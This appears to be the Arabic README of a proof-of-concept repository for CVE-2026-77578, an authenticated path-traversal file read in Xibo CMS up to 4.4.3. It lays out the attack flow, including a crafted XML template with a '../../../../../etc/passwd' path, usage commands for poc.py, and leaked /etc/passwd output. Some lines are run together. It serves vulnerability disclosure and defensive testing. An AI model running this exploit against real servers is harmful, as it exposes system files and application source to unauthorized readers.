
إثبات مفهوم بلغة Python يستغل CVE-2026-77578، وهو اجتياز مسار موثّق في Xibo CMS يقرأ ملفات محلية عشوائية عبر استيرادات قوالب XML المُصمَّمة.
CVE-2026-77578 هو ثغرة قراءة ملفات محلية عشوائية تتطلب المصادقة في Xibo CMS.
يمكن لمستخدم مُصادَق عليه يمتلك صلاحيات المسؤول (Admin) أو صلاحية الوصول إلى قوالب الوحدات (Module Templates) استيراد قالب XML مُصمَّم بعناية يحتوي على أصل (asset) قائم على مسار مع تسلسل اجتياز المسار (path traversal). بعد ذلك يمكن الوصول إلى الأصل الناتج عبر نقطة نهاية أصول الوحدة (module asset endpoint)، مما يؤدي إلى قيام Xibo بإرجاع محتويات الملف المحلي المُشار إليه.
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)نشرت Xibo الثغرة تحت المُعرّف GHSA-pc3g-2hhm-46qc، مؤكدةً أن الإصدارات <= 4.4.3 متأثرة وأن الإصدارات >= 4.4.4 مُرقَّعة. يُصنّف الإشعار الخطورة على أنها عالية مع درجة CVSS v3.1 تساوي 8.8، ويُحدّد CVE-2026-77578.
يقوم نص إثبات المفهوم بلغة Python المرفق بأتمتة عملية الاستغلال:
/developer/template/import./module/asset/<asset-id>.python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
مثال:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
مثال آخر:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
الخيار -f يكون افتراضيًا /etc/passwd.
يوضّح ما يلي الاسترجاع الناجح للملف /etc/passwd:
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
تم التحقق من الثغرة بنجاح مقابل عدة ملفات في بيئة اختبار محلية لـ Xibo CMS 4.4.3، بما في ذلك:
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpيوضّح اختبار ملف مصدر PHP أن المشكلة قادرة على إرجاع الشيفرة المصدرية للتطبيق، وليس مجرد بيانات وصفية للنظام.
يتيح الاستغلال الناجح لمهاجم مُصادَق عليه يمتلك صلاحيات قوالب الوحدات المطلوبة قراءة ملفات عشوائية يمكن لعملية تطبيق Xibo الوصول إليها.
اعتمادًا على طريقة النشر، قد يؤدي ذلك إلى كشف:
يُقدَّم إثبات المفهوم هذا لأغراض البحث الأمني المُصرَّح به والاختبار الدفاعي فقط.
اختبر فقط الأنظمة التي تملكها أو التي لديك إذن صريح بتقييمها.
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png